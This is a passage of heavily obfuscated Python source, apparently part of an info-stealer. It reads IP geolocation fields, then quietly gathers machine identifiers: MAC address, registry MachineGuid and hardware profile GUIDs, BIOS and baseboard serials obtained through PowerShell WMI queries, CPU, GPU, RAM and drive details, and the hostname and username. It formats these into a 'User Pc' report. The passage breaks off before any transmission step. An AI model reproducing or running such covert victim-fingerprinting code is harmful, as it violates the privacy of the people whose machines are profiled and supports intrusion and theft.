    BIOPQNGXESHWUWWHSYAYNRDADXDLVXRYSCALVTANPYOWUQZDKECRBGZJLYTBQPXWSHJQJBHQHYGIAJFXCPOCPDHAWMPCMQMA = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('regionName', "None")
    BIOPQNGXESHWUWWHSYAYNRDADXDLVXRYSCALVTANPYOWUQZDKECRBGZJLYTBQPXWSHJQJBHQHYGIAJFXCPOCPDHAWMPCMQMA_code = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('region', "None")
    HKXMQFCIPWIDFCHWUJEYPXOSZVAIMSQVVKRIQFYTWLECYAQNHDGSWTMCSOMJIQKETTSYBAEGSSISNO = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('zip', "None")
    JQJVPDOJTABDXTYBEDNAREXXOHLBOMSHWOOARSMYKYQIKPZPOPWADGRQYZDSEAQO = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('city', "None")
    BBAXEZMIBWHPQJRAWLNFFWHXYNTMQWNOKLBLHUKNABATHBPYUVRENQJKLREMDACJVQMYDPTVQEAFNQBNITPQYIFMTEGPDNUM = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('lat', "None")
    PIVQNKBWRJRSOJYXYOBSKGSMYVUVACKCQIYKXZOFDIGUNYUPUBDYIIWMSRBSNONFDKJZMNKGPYIQBZINLHDEUIQLIF = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('lon', "None")
    NPHOKWOKNTYHRODFXEJTCVFSGJJNHMNQAXBQLTRHOKOOQKWVNBQLUUISHPQXNYMWROPXXQHVZ = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('timezone', "None")
    BARXMIWZMEDCUMXOZBLLHFNOYOEYAKUZODWUDFYFKKZHZLYZBYJPLVSPFWOZCULPMTIW = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('isp', "None")
    GHBYTDJSHUIYVKLFTHCXXFMISNDSPMLWUKVTXJZTCMLSFBSKNKPTZFCUB = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('org', "None")
    YFXOROAEOKGPAMYEIGDRRWXQDTJUVJWXBROBLONGMJLVLNDWVSGAVNQRXQCSZBZFMCXKXUHLNMOJTEEEXWFRBGFVLM = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('as', "None")

def MBJHIYVNSVHBSLWQSUJADQJBLCNJGCTSDKGBIIOARQCSYCJGUZBSBPNTOFBT(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD):
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    import winreg

    try: JOBVTFQKCZJRTZGLGGKXJUAXRGYYSQEQMWAIDRJTQSRBNFWLPRVKPQSPBUDVMVTHWAKIEDFTPDBGXG = platform.system()
    except: JOBVTFQKCZJRTZGLGGKXJUAXRGYYSQEQMWAIDRJTQSRBNFWLPRVKPQSPBUDVMVTHWAKIEDFTPDBGXG = "None"

    try: EOTJEULCGVXWQUOIXDMRLKUUNKKHSLAMANPYQDIFWRXHKEQIEQKMEACVXCVTHKEIHLHCVXLCMLAIGMVFGVACGBDJTVENWANN = platform.version()
    except: EOTJEULCGVXWQUOIXDMRLKUUNKKHSLAMANPYQDIFWRXHKEQIEQKMEACVXCVTHKEIHLHCVXLCMLAIGMVFGVACGBDJTVENWANN = "None"

    try: EEWHQXZZULAPKXRMEXBDHPMVBKMJRMFTAEEQFRAZPXGRBWCBRCZCYWASDKVGMJLFDIZGVQTWXVAAVYQQYOVOB = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: EEWHQXZZULAPKXRMEXBDHPMVBKMJRMFTAEEQFRAZPXGRBWCBRCZCYWASDKVGMJLFDIZGVQTWXVAAVYQQYOVOB = "None"

    try: VALJXWGLUYAWRBRORFALLRDPACIHINLFNUSSHCQDJFSRMAQZUPRCQACMYETXFGLQFCYDWDXPGBKXIUMTLZILXIFVMTIEDBUS = str(round(psutil.virtual_memory().total / (1024**3), 2)) + "Go"
    except: VALJXWGLUYAWRBRORFALLRDPACIHINLFNUSSHCQDJFSRMAQZUPRCQACMYETXFGLQFCYDWDXPGBKXIUMTLZILXIFVMTIEDBUS = "None"

    try: BHXTTTAOUBYHHVHJZKEJMYCAVRBEKHFAHPMGPWISWLLGTNFXKRRVOIKURNFFFVIISTVRWBNHICZTKOAVIDDK = platform.processor()
    except: BHXTTTAOUBYHHVHJZKEJMYCAVRBEKHFAHPMGPWISWLLGTNFXKRRVOIKURNFFFVIISTVRWBNHICZTKOAVIDDK = "None"

    try: ZURIUHGJFTBPGOTUJFINLZBNISACHYATWZLDFEZRWHDHSRSAFZILPJZSZQJFIRFTYHCMVQMWCDKGPKQ = str(psutil.cpu_count(logical=False)) + " Core"
    except: ZURIUHGJFTBPGOTUJFINLZBNISACHYATWZLDFEZRWHDHSRSAFZILPJZSZQJFIRFTYHCMVQMWCDKGPKQ = "None"

    try: BZRZZAAATQJVOOORPZOSPAQGHJEOGLIXXFGJHHBAMHNQBVGABWWWNOIFGB = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: BZRZZAAATQJVOOORPZOSPAQGHJEOGLIXXFGJHHBAMHNQBVGABWWWNOIFGB = "None"

    FQBWALLICDQFMGTOUIFNKMNZRJCSCJQBXPMCIIXSGICYHADCESZZVNAQMGUDHURY                 = r"SOFTWARE\Microsoft\Cryptography"
    MAITKNULDSTZAPOSXLENDXZKJWXLESHOZGPFVWPEMJOZEDOVQIRRNNBFAOKOJDNVTVZDLSWUCLPASLNHSV                    = r"SOFTWARE\Microsoft\SQMClient"
    UASQDWDBUUJRXDHTDJYLXJNUFALNYFKFRVTOULROYHOAXUMWSVVJIEEAYIJTGBKXZXAUWGOMCIQDDXPKBTTQIZCTHCWGCUMILW             = r"SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001"
    PXMOYVUCQYQDKLMBNAJYFPXEVADXCKNUKCYSBZLUCJSYFWRIBUNNVSAJKPURNFFIOWWSKEUWVATXDRDINKDY                       = r'SOFTWARE\NVIDIA Corporation'
    XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC               = r'SYSTEM\HardwareConfig\Current'

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, FQBWALLICDQFMGTOUIFNKMNZRJCSCJQBXPMCIIXSGICYHADCESZZVNAQMGUDHURY, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "MachineGuid")
            NYUUBMHEUJKBHAKGVDMFPJOEHZFHUUCCZVCGESIQLJWNWSGCWMAITTJBKMQPMYPRKAFSKNG = str(v4r_value).replace("{", "").replace("}", "")
    except: NYUUBMHEUJKBHAKGVDMFPJOEHZFHUUCCZVCGESIQLJWNWSGCWMAITTJBKMQPMYPRKAFSKNG = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UASQDWDBUUJRXDHTDJYLXJNUFALNYFKFRVTOULROYHOAXUMWSVVJIEEAYIJTGBKXZXAUWGOMCIQDDXPKBTTQIZCTHCWGCUMILW, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "GUID")
            UDOMAVSCMCIXBKXFLPFLAHIKIBYTYZKTPLVAKMPNNNSSDZQYWMSWZRRIDFYBDWFLIZASCYHLQAB = str(v4r_value).replace("{", "").replace("}", "")
    except: UDOMAVSCMCIXBKXFLPFLAHIKIBYTYZKTPLVAKMPNNNSSDZQYWMSWZRRIDFYBDWFLIZASCYHLQAB = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UASQDWDBUUJRXDHTDJYLXJNUFALNYFKFRVTOULROYHOAXUMWSVVJIEEAYIJTGBKXZXAUWGOMCIQDDXPKBTTQIZCTHCWGCUMILW, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "HwProfileGuid")
            WXXQFJTIXHQCXPLVVMNDBEUVKJTZIAXHOYKJHZUXXLOJIOLOSNWNXCJQFJFDFABTS = str(v4r_value).replace("{", "").replace("}", "")
    except: WXXQFJTIXHQCXPLVVMNDBEUVKJTZIAXHOYKJHZUXXLOJIOLOSNWNXCJQFJFDFABTS = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, MAITKNULDSTZAPOSXLENDXZKJWXLESHOZGPFVWPEMJOZEDOVQIRRNNBFAOKOJDNVTVZDLSWUCLPASLNHSV, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "MachineId")
            XZJGKDCBKBRUZCCNVCURSZRNQDGXLMHQJAEJLCFNVKODEHURXRBIORWHKZOZNOFQJBSZCADBFFXNGQBDOOC = str(v4r_value).replace("{", "").replace("}", "")
    except: XZJGKDCBKBRUZCCNVCURSZRNQDGXLMHQJAEJLCFNVKODEHURXRBIORWHKZOZNOFQJBSZCADBFFXNGQBDOOC = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, PXMOYVUCQYQDKLMBNAJYFPXEVADXCKNUKCYSBZLUCJSYFWRIBUNNVSAJKPURNFFIOWWSKEUWVATXDRDINKDY+r'\Installer2', 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemID")
            VYNRBLTZBXQSOACXWVGWSLQKYMFAJROUNQYCZOHIBLXYCXXRZIMYJUKNPJUMXEVUVCBBTFCJVZQTBMOTJDZWVEUAPUSDKCDSMVBT = str(v4r_value).replace("{", "").replace("}", "")
    except: VYNRBLTZBXQSOACXWVGWSLQKYMFAJROUNQYCZOHIBLXYCXXRZIMYJUKNPJUMXEVUVCBBTFCJVZQTBMOTJDZWVEUAPUSDKCDSMVBT = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "BaseBoardProduct")
            QRRYUVSJGXAYJPAHEKTBXZHLDTOHACVLIOZZLGZIOJDYVWOVZBNVXCCOPLY = str(v4r_value).replace("{", "").replace("}", "")
    except: QRRYUVSJGXAYJPAHEKTBXZHLDTOHACVLIOZZLGZIOJDYVWOVZBNVXCCOPLY = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "BaseBoardManufacturer")
            KCCWZJGNAURVIVQCYIFFJEEBVTUXCBRQIQAAXIEEKXJMBZQVAZYTWW = str(v4r_value).replace("{", "").replace("}", "")
    except: KCCWZJGNAURVIVQCYIFFJEEBVTUXCBRQIQAAXIEEKXJMBZQVAZYTWW = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "BIOSReleaseDate")
            WZBAXRJONJGOURBASTZRLKERWEVOFXNNOBEHXZXQWVNMNOEZSUWQWYONHPXWLSRYOPKXYWD = str(v4r_value).replace("{", "").replace("}", "")
    except: WZBAXRJONJGOURBASTZRLKERWEVOFXNNOBEHXZXQWVNMNOEZSUWQWYONHPXWLSRYOPKXYWD = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "BIOSVersion")
            OTSADPGCXMKAYMBKILSFEWSIZWODNHQPAQKPCYHMWPZFSRIPHBTMWGDKDTBUXTGVHRJAHWASSUTPGPYLOFTBTD = str(v4r_value).replace("{", "").replace("}", "")
    except: OTSADPGCXMKAYMBKILSFEWSIZWODNHQPAQKPCYHMWPZFSRIPHBTMWGDKDTBUXTGVHRJAHWASSUTPGPYLOFTBTD = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemBiosVersion")
            DKRGEOYNKTLTWAPQNARBMUJWZAMMRHKJDNELWDJBHSCCHHIQQKTRZQTTZYDRZ = str(v4r_value).replace("{", "").replace("}", "")
    except: DKRGEOYNKTLTWAPQNARBMUJWZAMMRHKJDNELWDJBHSCCHHIQQKTRZQTTZYDRZ = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemVersion")
            WVREOIYOZCEEUAFURJXLAGGWZNNUKJUWKFZJEDRSDNOFXELCPNCBOLQJAOQUXZALKKUPFFHPJXACFHMXKCGOCBDJVPLRAAKM = str(v4r_value).replace("{", "").replace("}", "")
    except: WVREOIYOZCEEUAFURJXLAGGWZNNUKJUWKFZJEDRSDNOFXELCPNCBOLQJAOQUXZALKKUPFFHPJXACFHMXKCGOCBDJVPLRAAKM = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemFamily")
            XGBUWJVUWQNIFGYRBNEPRMZLRJWTUHYCQOZGJYOQHPIUQKEBANGNBPAHKGCHZFKIFGKXCVHLGKPZFPK = str(v4r_value).replace("{", "").replace("}", "")
    except: XGBUWJVUWQNIFGYRBNEPRMZLRJWTUHYCQOZGJYOQHPIUQKEBANGNBPAHKGCHZFKIFGKXCVHLGKPZFPK = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemManufacturer")
            JCFVYJMZVBKCUIJGYSRJITNUFBAEKJPULRMLWMMBYEEHUQYUSFBAOELM = str(v4r_value).replace("{", "").replace("}", "")
    except: JCFVYJMZVBKCUIJGYSRJITNUFBAEKJPULRMLWMMBYEEHUQYUSFBAOELM = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemProductName")
            MEQVLINDQYMWISVZVPASSDCJRSPSMMXGDWPIGRVWNDXJNDTPQPPCIZEZFPKSPLVSZZZ = str(v4r_value).replace("{", "").replace("}", "")
    except: MEQVLINDQYMWISVZVPASSDCJRSPSMMXGDWPIGRVWNDXJNDTPQPPCIZEZFPKSPLVSZZZ = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, XJOXMUCMAKDOWPPMPOEICSWKQUJBNMIXMVVWUQMJRJWFCCADEWXPBYEWNPMFWDAYAYUZRXOBBXXYBRSBDKOSFSHGDVOWC, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemSKU")
            IOFAPPDMMYMSMYFUZGBSZRLXKFARJYSEHHGHPJWGUUQOKJXFGZBNMICJBNHLBESKVZVHXRWNYMYLXZDEJYY = str(v4r_value).replace("{", "").replace("}", "")
    except: IOFAPPDMMYMSMYFUZGBSZRLXKFARJYSEHHGHPJWGUUQOKJXFGZBNMICJBNHLBESKVZVHXRWNYMYLXZDEJYY = None

    def RunPowershell(query):
        try:
            result = subprocess.check_output(
                ['powershell', '-Command', query],
                stderr=subprocess.STDOUT,
                text=True
            ).split('\n')[0].strip()
            return result if result else None
        except:
            return None

    try: FWMIIMVLJCJXFKXZUAGWDCISDLTKWHFMCHVKZGXRYEHOHFORKAHQUOSEEIOCGHSZWJGVAPJWMDPE = RunPowershell("(Get-WmiObject -Class Win32_ComputerSystemProduct).UUID")
    except: FWMIIMVLJCJXFKXZUAGWDCISDLTKWHFMCHVKZGXRYEHOHFORKAHQUOSEEIOCGHSZWJGVAPJWMDPE = None

    try: WMTRYXZAIDOBHHRZLQQRIBCDPMAQYFBNHKUQVYGAXGVVYNNVPNTKLGJXARHBLQDCXBOXDVLQSNSLFMUWLNVVRFL = RunPowershell("(Get-WmiObject -Class Win32_BIOS).SerialNumber")
    except: WMTRYXZAIDOBHHRZLQQRIBCDPMAQYFBNHKUQVYGAXGVVYNNVPNTKLGJXARHBLQDCXBOXDVLQSNSLFMUWLNVVRFL = None

    try: PBQTBQWHOXBUGNRZDYTEXOGVGVGAYGWPJFFONQKTULZYZGGLSYFZEHAFONZDXWKEJRFSNKRFZCYAGDFBSWDSFRR = RunPowershell("(Get-WmiObject -Class Win32_BaseBoard).SerialNumber")
    except: PBQTBQWHOXBUGNRZDYTEXOGVGVGAYGWPJFFONQKTULZYZGGLSYFZEHAFONZDXWKEJRFSNKRFZCYAGDFBSWDSFRR = None

    try: FGQSHEYKORDILPLIEJOSWGBLASRWRHBPYFBAEXUUJYXRQLDXRLZULALXJHXLCQA = RunPowershell("(Get-WmiObject -Class Win32_Processor).ProcessorId")
    except: FGQSHEYKORDILPLIEJOSWGBLASRWRHBPYFBAEXUUJYXRQLDXRLZULALXJHXLCQA = None

    try: IKEKELJHOQSSLXWORSNGHXOTPYIUYLWUNXULZHDDBDHTJSHKWOZXHXSTONWICBIKBCNOCWVZZOTSXSEEUGNWUPXAMNSXVZFJJZX = RunPowershell("(Get-WmiObject -Class Win32_BIOS).OEMStringArray")
    except: IKEKELJHOQSSLXWORSNGHXOTPYIUYLWUNXULZHDDBDHTJSHKWOZXHXSTONWICBIKBCNOCWVZZOTSXSEEUGNWUPXAMNSXVZFJJZX = None

    try: ECAWMOLCJQTXFCEBWGOAHPBKTMVXMMZAQHMIECNIFRVSLCFKKLEKDWSXCROXZPNCBOZROZDUZXBZKUBVABVVMSLLNMYLUVCDOW = RunPowershell("(Get-WmiObject -Class Win32_SystemEnclosure).SMBIOSAssetTag")
    except: ECAWMOLCJQTXFCEBWGOAHPBKTMVXMMZAQHMIECNIFRVSLCFKKLEKDWSXCROXZPNCBOZROZDUZXBZKUBVABVVMSLLNMYLUVCDOW = None
        
    try:
        UGNEHUWSHQFUGCCVFGMNYJUGMTAHJQLTWEOEMWLLVXLLQAUZCGSHDAEULFLEAKCISSEOGCASBXOYUZQTMZJGHGLJRBVA = []
        GKSWTTHQQSGZJIBKIEOZGKJDCWSXDZWQNUPLCHMIHQRQAVCXXCUI = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if GKSWTTHQQSGZJIBKIEOZGKJDCWSXDZWQNUPLCHMIHQRQAVCXXCUI & 1:
                JDPBMRBZHZFUBFARNSQDHKBTTJOBCPKCBCFWLIMZSESPPHXULQSYOFVPZQLEKVYMYSXP = v4r_letter + ":\\"
                try:
                    ZLGUBIXKHPKZEVITQCYMKUIRKJJNYCVZMIQKIZNRDWZFSXEUHULSMVZMIVPQQIQBDDXIVPLI = ctypes.c_ulonglong(0)
                    FWIHQBKLCTJZZYKBKDPIADPHWFZBXADMDOAJITRQGDAQDKJRGSEXBYMYLH = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(JDPBMRBZHZFUBFARNSQDHKBTTJOBCPKCBCFWLIMZSESPPHXULQSYOFVPZQLEKVYMYSXP), None, ctypes.pointer(FWIHQBKLCTJZZYKBKDPIADPHWFZBXADMDOAJITRQGDAQDKJRGSEXBYMYLH), ctypes.pointer(ZLGUBIXKHPKZEVITQCYMKUIRKJJNYCVZMIQKIZNRDWZFSXEUHULSMVZMIVPQQIQBDDXIVPLI))
                    UWKRKGUBFKTIVCYFFILTXFYVYEDFFVUWBIOYZSXJFVAFXMUJLSIRIYCZPIJWVBGUUBNG = FWIHQBKLCTJZZYKBKDPIADPHWFZBXADMDOAJITRQGDAQDKJRGSEXBYMYLH.value
                    TXZOZFMWBAAIDLXFBHYAJWMWTOULTHDDJBTIACTMOSIAAVXEYOSXJZKRDWPVEAWLUKGDYAPYLJRMPMOUFE = ZLGUBIXKHPKZEVITQCYMKUIRKJJNYCVZMIQKIZNRDWZFSXEUHULSMVZMIVPQQIQBDDXIVPLI.value
                    GUOHSZNHQPOCJLPRGYRNPYDIKBDEESWTFAMCRFNJJHSEVPXRVEKCMDLGTMNLACIZYVZNBSMLABWWMFZOEZXCKYDXK = UWKRKGUBFKTIVCYFFILTXFYVYEDFFVUWBIOYZSXJFVAFXMUJLSIRIYCZPIJWVBGUUBNG - TXZOZFMWBAAIDLXFBHYAJWMWTOULTHDDJBTIACTMOSIAAVXEYOSXJZKRDWPVEAWLUKGDYAPYLJRMPMOUFE
                    YUWDTUSMOWSURHFYFBFLRIMLOLPMHCUEUKFEDTHIAKZRGDKZWEFGDD = win32api.GetVolumeInformation(JDPBMRBZHZFUBFARNSQDHKBTTJOBCPKCBCFWLIMZSESPPHXULQSYOFVPZQLEKVYMYSXP)[0]
                    drive = {
                        'drive': JDPBMRBZHZFUBFARNSQDHKBTTJOBCPKCBCFWLIMZSESPPHXULQSYOFVPZQLEKVYMYSXP,
                        'total': UWKRKGUBFKTIVCYFFILTXFYVYEDFFVUWBIOYZSXJFVAFXMUJLSIRIYCZPIJWVBGUUBNG,
                        'free': TXZOZFMWBAAIDLXFBHYAJWMWTOULTHDDJBTIACTMOSIAAVXEYOSXJZKRDWPVEAWLUKGDYAPYLJRMPMOUFE,
                        'used': GUOHSZNHQPOCJLPRGYRNPYDIKBDEESWTFAMCRFNJJHSEVPXRVEKCMDLGTMNLACIZYVZNBSMLABWWMFZOEZXCKYDXK,
                        'name': YUWDTUSMOWSURHFYFBFLRIMLOLPMHCUEUKFEDTHIAKZRGDKZWEFGDD,
                    }
                    UGNEHUWSHQFUGCCVFGMNYJUGMTAHJQLTWEOEMWLLVXLLQAUZCGSHDAEULFLEAKCISSEOGCASBXOYUZQTMZJGHGLJRBVA.append(drive)
                except:
                    ()
            GKSWTTHQQSGZJIBKIEOZGKJDCWSXDZWQNUPLCHMIHQRQAVCXXCUI >>= 1

        SVPOOVJRHJBRLVPWLYZTJMEJUNUERDXTZXKHBYXBKIGIPIYHZXVWKWDXKPQXIVPXKVGSBWSLZUTOZZKBHNXFP = "   {:<7} {:<10} {:<10} {:<10} {:<20}".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in UGNEHUWSHQFUGCCVFGMNYJUGMTAHJQLTWEOEMWLLVXLLQAUZCGSHDAEULFLEAKCISSEOGCASBXOYUZQTMZJGHGLJRBVA:
            PLKYWBTHYQQLNYVMCVAYLSDLGJNFHBMQFOSCOJOLGDYNTXZHRYVCLFVWFMABSHTZTBMNUHFWDMIZIQNSOAQHQGGNUY = (v4r_drive['used'] / v4r_drive['total']) * 100
            TXZOZFMWBAAIDLXFBHYAJWMWTOULTHDDJBTIACTMOSIAAVXEYOSXJZKRDWPVEAWLUKGDYAPYLJRMPMOUFE_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            UWKRKGUBFKTIVCYFFILTXFYVYEDFFVUWBIOYZSXJFVAFXMUJLSIRIYCZPIJWVBGUUBNG_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            PLKYWBTHYQQLNYVMCVAYLSDLGJNFHBMQFOSCOJOLGDYNTXZHRYVCLFVWFMABSHTZTBMNUHFWDMIZIQNSOAQHQGGNUY_str = "{:.2f}%".format(PLKYWBTHYQQLNYVMCVAYLSDLGJNFHBMQFOSCOJOLGDYNTXZHRYVCLFVWFMABSHTZTBMNUHFWDMIZIQNSOAQHQGGNUY)
            SVPOOVJRHJBRLVPWLYZTJMEJUNUERDXTZXKHBYXBKIGIPIYHZXVWKWDXKPQXIVPXKVGSBWSLZUTOZZKBHNXFP += "\n - {:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   TXZOZFMWBAAIDLXFBHYAJWMWTOULTHDDJBTIACTMOSIAAVXEYOSXJZKRDWPVEAWLUKGDYAPYLJRMPMOUFE_gb,
                                                                   UWKRKGUBFKTIVCYFFILTXFYVYEDFFVUWBIOYZSXJFVAFXMUJLSIRIYCZPIJWVBGUUBNG_gb,
                                                                   PLKYWBTHYQQLNYVMCVAYLSDLGJNFHBMQFOSCOJOLGDYNTXZHRYVCLFVWFMABSHTZTBMNUHFWDMIZIQNSOAQHQGGNUY_str,
                                                                   v4r_drive['name'])
    except:
        SVPOOVJRHJBRLVPWLYZTJMEJUNUERDXTZXKHBYXBKIGIPIYHZXVWKWDXKPQXIVPXKVGSBWSLZUTOZZKBHNXFP = """   Drive:  Free:      Total:     Use:       Name:       
   None    None       None       None       None     
"""

    try:
        def IsPortable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if IsPortable():
            GMCNPSLGODQDPQLOBQUBITSULWCCXPCBYPYBZBTXKFRSQCPURRWHUNKPWWKRNIXKYYSVAIKCKJKNOBPXSQVKH = 'Pc Portable'
        else:
            GMCNPSLGODQDPQLOBQUBITSULWCCXPCBYPYBZBTXKFRSQCPURRWHUNKPWWKRNIXKYYSVAIKCKJKNOBPXSQVKH = 'Pc Fixed'
    except:
        GMCNPSLGODQDPQLOBQUBITSULWCCXPCBYPYBZBTXKFRSQCPURRWHUNKPWWKRNIXKYYSVAIKCKJKNOBPXSQVKH = "None"

    try: AKLRKBUWVLQPXYXUGCDEOETIVUMXIOCJLWLJDHNGXIZFAEQPGE = len(screeninfo.get_monitors())
    except: AKLRKBUWVLQPXYXUGCDEOETIVUMXIOCJLWLJDHNGXIZFAEQPGE = "None"

    HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_system_info = "Yes"
    ZKAUKMEBIKUOSKBGHIYCLRKNJYMOCVPNVPIDCRPYOOEBYAHQYGMHQUORMZYFBFVBTHFHNNKDUXYYEGCSINIGUMCX = f"""
User Pc:
 - Hostname    : {DNCRQGYAVNZCFUVDLLUUPMEAVXXJPOYKWZRKXTGKGPURFPZFKBNESGGIWJPGAIWKRSTTRZOQGKLPBZNQYIVGVI}
 - Username    : {ULNYRBBLQSGHOGDXOQUHIGLAXMGBBKFUWQYVVZXYEAQKQBXLRUCERYEWRIIHIHZXGFYLGJGCZBXMAWVKZF}
 - DisplayName : {LTQUKIQQANBEFIGMVVRURAZUZDMHOSQTURWBDGVRVJIVTSDZAFFHRMPVKDOTVTQCOEUWQWECH}

System:
 - Plateform     : {GMCNPSLGODQDPQLOBQUBITSULWCCXPCBYPYBZBTXKFRSQCPURRWHUNKPWWKRNIXKYYSVAIKCKJKNOBPXSQVKH}
 - Exploitation  : {JOBVTFQKCZJRTZGLGGKXJUAXRGYYSQEQMWAIDRJTQSRBNFWLPRVKPQSPBUDVMVTHWAKIEDFTPDBGXG} {EOTJEULCGVXWQUOIXDMRLKUUNKKHSLAMANPYQDIFWRXHKEQIEQKMEACVXCVTHKEIHLHCVXLCMLAIGMVFGVACGBDJTVENWANN}
 - Screen Number : {AKLRKBUWVLQPXYXUGCDEOETIVUMXIOCJLWLJDHNGXIZFAEQPGE}

Peripheral:
 - CPU : {BHXTTTAOUBYHHVHJZKEJMYCAVRBEKHFAHPMGPWISWLLGTNFXKRRVOIKURNFFFVIISTVRWBNHICZTKOAVIDDK}, {ZURIUHGJFTBPGOTUJFINLZBNISACHYATWZLDFEZRWHDHSRSAFZILPJZSZQJFIRFTYHCMVQMWCDKGPKQ} 
